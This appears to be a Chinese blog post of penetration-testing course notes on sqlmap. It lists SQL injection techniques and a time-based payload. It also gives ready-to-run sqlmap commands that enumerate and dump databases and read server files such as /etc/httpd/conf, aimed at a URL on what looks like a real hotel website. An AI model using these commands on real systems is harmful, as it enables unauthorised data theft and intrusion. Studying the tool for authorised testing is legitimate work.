sqlmap应用 第三十三天 周五

sqlmap的五种漏洞检测技术

    基于布尔的盲注检测

    基于时间的盲注检测
        ' and sleep(0) --+

    基于报错的检测(报错型注入)

    基于union联合查询的检测
        通过循环输出查询结果,否则只显示第一项结果

    基于堆叠查询
        多语句查询
        适用于非select的数据修改,删除的操作

支持的数据库管理系统DBMS:         

★一阶注射

★二阶注射

一阶注射是指输入的注射语句对WEB直接产生了影响,出现了结果;二阶注入类似存储型XSS,是指输入提交的语句,无法直接对WEB应用程序产生影响,通过其它的辅助间接的对WEB产生危害,这样的就被称为是二阶注入.
基于注入点的位置上的 

▲通过用户输入的表单域的注射。

▲通过cookie注射。

▲通过服务器变量注射。 (基于头部信息的注射)

常用的系统函数

1. version()——MySQL版本
2. user()——数据库用户名
3. database()——数据库名
4. @@datadir——数据库路径
5. @@version_compile_os——操作系统版本

sqlmap参数

-p 指定注入点参数

应用实例:

sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id

-v 显示请求头

sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id -v 5
不管注入是否成功,都会显示出请求头来

通过注入点查看当前数据库

sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id --dbs


查看数据库下的表

sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id -D security --tables


查看数据库及表下的列
sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id -D security -T emails --columns

指定字段,通过dump脱库,

sqlmap的另类应用

get数据包的应用

相关语法:
sqlmap -r Decktop/a.txt  自动识别参数,

post数据包的应用

修改参数位置,可以用burpsuite抓包发送reperter复制粘贴

sqlmap -r Decktop/a.txt   其数据库,表,列的查询与上面的一致

cookie值的应用

查看系统命令

--users 查看系统用户

--privileges 查看管理员权限

--batch 静默选择项

根据系统命令读取系统配置文件信息

通过注入点应用:--file-read 函数读取以下信息

"/etc/httpd/conf"
"/var/www/html/index.php"

注意点:
1、apache在linux用yum源装载,在默认的目录下
2、apache在

windows




转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 zhumeng512@qq.com

文章标题:sqlmap应用 第三十三天 周五

本文作者:弈少

发布时间:2019-08-31, 19:35:53

最后更新:2019-09-01, 00:12:45

原始链接:http://yoursite.com/2019/08/31/北京渗透测试第三十三天 20190830/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏

相册